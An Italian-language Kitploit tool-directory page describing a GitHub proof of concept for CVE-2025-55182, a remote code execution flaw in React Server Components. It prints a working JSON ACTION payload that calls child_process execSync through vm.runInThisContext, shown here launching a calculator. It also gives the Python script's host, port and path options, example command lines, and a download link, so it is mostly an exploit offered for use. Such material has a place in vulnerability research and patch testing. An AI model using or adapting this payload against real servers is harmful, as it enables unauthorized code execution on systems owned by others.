Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182POC | Kitploit
Strumenti/GitHubGitHub/sudo-yangziran/cve-2025-55182poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubsudo-yangziran/cve-2025-55182poc

CVE-2025-55182POC

Vedi Repository
28 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 React Server Components RCE POC

Questo progetto è CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept e dimostra che, in determinate condizioni, è possibile innescare l'esecuzione remota di codice tramite vm.runInThisContext e un payload ACTION malintenzionato.

  • Lato Python: invia automaticamente il payload ACTION malintenzionato e ne analizza la risposta

⚠ Panoramica della vulnerabilità (CVE-2025-55182)

Il payload ACTION di React Server Components, in determinate condizioni:

  • viene deserializzato in un oggetto JS
  • viene eseguito tramite vm.runInThisContext
  • viene automaticamente iniettato nelle server actions

L'attaccante può costruire un payload:

root@kitploit:~
{
  "$ACTION_REF_0": "",
  "$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
ParametroObbligatorioValore predefinitoDescrizione
--hostSìNessunoIP o dominio del server di destinazione. Es.: 127.0.0.1, 192.168.1.10, example.com
--portNo80Porta del servizio HTTP di destinazione, es.: 3003
--pathSìNessunoPercorso della rotta di destinazione che può attivare la vulnerabilità, es.: /feedback, /action
--httpsNoFalseIndica se inviare il payload tramite HTTPS (predefinito: HTTP)

python a.py --host <目标IP> --port <端口> --path <目标URL路径>

python a.py --host 127.0.0.1 --port 3003 --path /feedback

Scarica lo strumento